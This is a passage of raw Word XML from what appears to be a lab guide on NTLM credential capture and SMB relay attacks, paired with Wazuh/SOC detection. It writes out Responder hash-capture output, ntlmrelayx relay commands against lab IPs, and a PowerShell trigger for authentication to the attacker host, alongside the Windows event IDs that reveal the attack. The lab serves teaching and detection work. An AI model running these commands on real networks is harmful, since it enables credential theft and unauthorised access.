                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3FB629" w14:textId="77777777" w:rsidR="00E879E9" w:rsidRPr="00E879E9" w:rsidRDefault="00E879E9" w:rsidP="00E879E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E879E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>On Windows victim:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203C29D9" w14:textId="77777777" w:rsidR="00E879E9" w:rsidRPr="00E879E9" w:rsidRDefault="00E879E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E879E9">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Attempt to access a non-existent file share or UNC path:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19198A76" w14:textId="26454024" w:rsidR="00477826" w:rsidRPr="00477826" w:rsidRDefault="00477826" w:rsidP="00477826">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidRPr="00E879E9">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>\\</w:t>
        </w:r>
        <w:r w:rsidRPr="00BE22D7">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>seminar</w:t>
        </w:r>
        <w:r w:rsidRPr="00E879E9">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>\</w:t>
        </w:r>
        <w:r w:rsidRPr="00BE22D7">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>videos</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00477826">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E879E9" w:rsidRPr="00E879E9">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Or open a link in a document or browser that doesn’t exist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB87D74" w14:textId="2776C225" w:rsidR="00477826" w:rsidRPr="00E879E9" w:rsidRDefault="00477826" w:rsidP="00477826">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3526908C" wp14:editId="3AF65C87">
            <wp:extent cx="5044698" cy="1601913"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="21062022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506" cy="1689494"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEB7EC2" w14:textId="77777777" w:rsidR="00E879E9" w:rsidRPr="00E879E9" w:rsidRDefault="00E879E9" w:rsidP="00E879E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E879E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Observation on Kali:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6AA1C2" w14:textId="77777777" w:rsidR="00E879E9" w:rsidRPr="00E879E9" w:rsidRDefault="00E879E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E879E9">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Responder poisons LLMNR/NBT-NS requests and captures NTLMv2 hashes from the victim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCC5BAE" w14:textId="77777777" w:rsidR="00E879E9" w:rsidRPr="00E879E9" w:rsidRDefault="00E879E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E879E9">
        <w:t>Example output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E5F1A3" w14:textId="77777777" w:rsidR="00E879E9" w:rsidRPr="00E879E9" w:rsidRDefault="00E879E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E879E9">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>[*] [LLMNR] Poisoned answer sent to 192.168.182.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5573C25F" w14:textId="77777777" w:rsidR="00E879E9" w:rsidRPr="00E879E9" w:rsidRDefault="00E879E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00E879E9">
        <w:t>[SMB] NTLMv2-SSP Client: 192.168.182.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F48D47" w14:textId="77777777" w:rsidR="00E879E9" w:rsidRPr="00E879E9" w:rsidRDefault="00E879E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E879E9">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>[SMB] NTLMv2-SSP Username: WINSERV\Administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A9DBFD" w14:textId="4E80F804" w:rsidR="00E879E9" w:rsidRPr="00477826" w:rsidRDefault="00E879E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E879E9">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>[SMB] NTLMv2-SSP Hash: &lt;hash&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4089E6" w14:textId="055602E1" w:rsidR="00477826" w:rsidRPr="00E879E9" w:rsidRDefault="00477826" w:rsidP="00E879E9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EE50AB3" wp14:editId="5E352697">
            <wp:extent cx="6640830" cy="1263187"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="8722767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006" cy="1271780"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="00818DC2" w14:textId="77777777" w:rsidR="00477826" w:rsidRDefault="00477826" w:rsidP="00E879E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68BD7BB6" w14:textId="4E7F6FE6" w:rsidR="00477826" w:rsidRDefault="00477826" w:rsidP="00477826">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00477826">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E8"/>
      </w:r>
      <w:r w:rsidRPr="00477826">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Responder captures NTLM authentication attempts (hashes). Even if the relay fails, these captures show credential harvesting activity and should trigger SOC investigation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BF7794" w14:textId="77777777" w:rsidR="00746BBB" w:rsidRPr="00746BBB" w:rsidRDefault="00746BBB" w:rsidP="00746BBB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00746BBB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Observation on Wazuh agent (Windows Server logs):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345B1CC4" w14:textId="77777777" w:rsidR="00746BBB" w:rsidRPr="00746BBB" w:rsidRDefault="00746BBB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00746BBB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Failed NTLM network logon:</w:t>
      </w:r>
      <w:r w:rsidRPr="00746BBB">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> EventID 4625, LogonType 3, AuthPackage NTLM, Source 192.168.182.136</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266B674B" w14:textId="77777777" w:rsidR="00746BBB" w:rsidRPr="00746BBB" w:rsidRDefault="00746BBB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00746BBB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Successful NTLM network logon (if relay succeeds):</w:t>
      </w:r>
      <w:r w:rsidRPr="00746BBB">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> EventID 4624, LogonType 3, AuthPackage NTLM, Source 192.168.182.136</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC78D19" w14:textId="77777777" w:rsidR="00477826" w:rsidRPr="00477826" w:rsidRDefault="00477826" w:rsidP="00477826">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C0BF8E3" w14:textId="0527F3B8" w:rsidR="00E879E9" w:rsidRDefault="00E879E9" w:rsidP="00E879E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">2- </w:t>
      </w:r>
      <w:r w:rsidRPr="00E879E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Setting Up the Relay Environment (Kali)</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879E9" w:rsidRPr="001E2C55" w14:paraId="2923ADE5" w14:textId="77777777" w:rsidTr="00E879E9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="3FE33321" w14:textId="77777777" w:rsidR="00E879E9" w:rsidRPr="00E879E9" w:rsidRDefault="00E879E9" w:rsidP="00E879E9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00E879E9">
              <w:t>python3 -m venv ~/impacket-venv</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A2D5B4C" w14:textId="77777777" w:rsidR="00E879E9" w:rsidRPr="00E879E9" w:rsidRDefault="00E879E9" w:rsidP="00E879E9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00E879E9">
              <w:t>source ~/impacket-venv/bin/activate    # Always use source to activate the environment</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09143214" w14:textId="77777777" w:rsidR="00E879E9" w:rsidRPr="00E879E9" w:rsidRDefault="00E879E9" w:rsidP="00E879E9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00E879E9">
              <w:t>pip install --upgrade pip</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D6364ED" w14:textId="66D1D6F8" w:rsidR="00E879E9" w:rsidRDefault="00E879E9" w:rsidP="00E879E9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00E879E9">
              <w:t>pip install impacket</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5257F913" w14:textId="3CC6D377" w:rsidR="00E879E9" w:rsidRPr="00E64255" w:rsidRDefault="00E879E9" w:rsidP="00E879E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13FB3B3A" w14:textId="59188541" w:rsidR="00E879E9" w:rsidRPr="00E879E9" w:rsidRDefault="00E879E9" w:rsidP="00E879E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3- </w:t>
      </w:r>
      <w:r w:rsidRPr="00E879E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>SMB Relay Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA392A0" w14:textId="2D28FA26" w:rsidR="00E879E9" w:rsidRDefault="00E879E9" w:rsidP="00E879E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E879E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Option A: Target single hos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879E9" w:rsidRPr="001E2C55" w14:paraId="18D2B991" w14:textId="77777777" w:rsidTr="00E879E9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="1A06FADD" w14:textId="6B213099" w:rsidR="00E879E9" w:rsidRDefault="00E879E9" w:rsidP="00E879E9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00E879E9">
              <w:t>ntlmrelayx.py -t smb://192.168.182.10 -smb2support --no-dump --no-acl --no-validate-privs --remove-mic -debug</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="17790CF1" w14:textId="77777777" w:rsidR="00E879E9" w:rsidRPr="00E879E9" w:rsidRDefault="00E879E9" w:rsidP="00E879E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F77EEC1" w14:textId="520D3C1D" w:rsidR="00E879E9" w:rsidRDefault="00E879E9" w:rsidP="00E879E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E879E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Option B: Target from fil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879E9" w:rsidRPr="001E2C55" w14:paraId="404407C6" w14:textId="77777777" w:rsidTr="00E879E9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="1109CE82" w14:textId="7AE1C904" w:rsidR="00E879E9" w:rsidRDefault="00E879E9" w:rsidP="00E879E9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00E879E9">
              <w:t>sudo python3 -m impacket.ntlmrelayx -tf targets.txt -smb2support</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6834CECF" w14:textId="77777777" w:rsidR="00E879E9" w:rsidRPr="00E879E9" w:rsidRDefault="00E879E9" w:rsidP="00E879E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E7051D5" w14:textId="610B0813" w:rsidR="00E879E9" w:rsidRPr="00E879E9" w:rsidRDefault="00E879E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E879E9">
        <w:t>targets.txt contains: 192.168.182.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76001BE3" w14:textId="77777777" w:rsidR="00E879E9" w:rsidRPr="00E879E9" w:rsidRDefault="00E879E9" w:rsidP="00E879E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E879E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>On Windows victim:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3AC68D" w14:textId="77777777" w:rsidR="00E879E9" w:rsidRPr="00E879E9" w:rsidRDefault="00E879E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E879E9">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Trigger the relay manually via PowerShell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BC9A57" w14:textId="1FF28613" w:rsidR="00E879E9" w:rsidRDefault="00E879E9" w:rsidP="00E879E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E879E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t># One-time drive mapping (non-persisten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E879E9" w:rsidRPr="001E2C55" w14:paraId="720CD0C7" w14:textId="77777777" w:rsidTr="00E879E9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="7D1D8F3B" w14:textId="013A1AC7" w:rsidR="00E879E9" w:rsidRDefault="00E879E9" w:rsidP="00E879E9">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00E879E9">
              <w:t>New-PSDrive -Name X -PSProvider FileSystem -Root "\\192.168.182.136\IPC$" -Persist:$false -ErrorAction SilentlyContinue</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="16FEECFA" w14:textId="77777777" w:rsidR="00E879E9" w:rsidRPr="00E879E9" w:rsidRDefault="00E879E9" w:rsidP="00E879E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="767A0253" w14:textId="77777777" w:rsidR="00E879E9" w:rsidRPr="00E879E9" w:rsidRDefault="00E879E9" w:rsidP="00E879E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E879E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Observation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B81AC5" w14:textId="77777777" w:rsidR="00E879E9" w:rsidRPr="00E879E9" w:rsidRDefault="00E879E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E879E9">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>NTLM credentials captured by attacker and relayed to the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FA893C" w14:textId="6D4EDB1E" w:rsidR="00E879E9" w:rsidRPr="00E879E9" w:rsidRDefault="00E879E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E879E9">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Note: Modern Windows systems with SMB signing enabled may block relay attacks; only capture-only attacks may succeed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E98C19" w14:textId="77777777" w:rsidR="00E879E9" w:rsidRPr="00E879E9" w:rsidRDefault="00E879E9" w:rsidP="00E879E9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E879E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Important Notes </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0236D372" w14:textId="2E96F95F" w:rsidR="00E879E9" w:rsidRPr="00E879E9" w:rsidRDefault="00E879E9" w:rsidP="00E879E9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E879E9">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Do NOT run Responder and ntlmrelayx on the same interface simultaneously → port conflicts (SMB ports 445/139).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5A7A15" w14:textId="77777777" w:rsidR="00E879E9" w:rsidRPr="00E879E9" w:rsidRDefault="00E879E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E879E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Victim vs Relay Target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060A3DEB" w14:textId="77777777" w:rsidR="00E879E9" w:rsidRPr="00E879E9" w:rsidRDefault="00E879E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E879E9">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Victim: machine tricked into authenticating → provides credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F61303" w14:textId="77777777" w:rsidR="00E879E9" w:rsidRPr="00E879E9" w:rsidRDefault="00E879E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E879E9">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Relay Target: high-value machine attacker wants to access (server, DC).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684442F1" w14:textId="77777777" w:rsidR="00E879E9" w:rsidRPr="00E879E9" w:rsidRDefault="00E879E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="66"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E879E9">
        <w:t>Usually, victim ≠ relay target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4CDA4F" w14:textId="1DC8FD3B" w:rsidR="007B3EE9" w:rsidRDefault="007B3EE9" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21085050" w14:textId="77777777" w:rsidR="009B10B3" w:rsidRDefault="009B10B3" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="609696E1" w14:textId="77777777" w:rsidR="009B10B3" w:rsidRDefault="009B10B3" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54DD6C49" w14:textId="77777777" w:rsidR="009B10B3" w:rsidRDefault="009B10B3" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B08954F" w14:textId="77777777" w:rsidR="009B10B3" w:rsidRDefault="009B10B3" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65652A6B" w14:textId="77777777" w:rsidR="009B10B3" w:rsidRDefault="009B10B3" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64037BDD" w14:textId="77777777" w:rsidR="009B10B3" w:rsidRDefault="009B10B3" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D8C2C5D" w14:textId="77777777" w:rsidR="009B10B3" w:rsidRDefault="009B10B3" w:rsidP="003276E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E69C0E6" w14:textId="77777777" w:rsidR="00D107A3" w:rsidRPr="00D107A3" w:rsidRDefault="00D107A3" w:rsidP="00D107A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D107A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
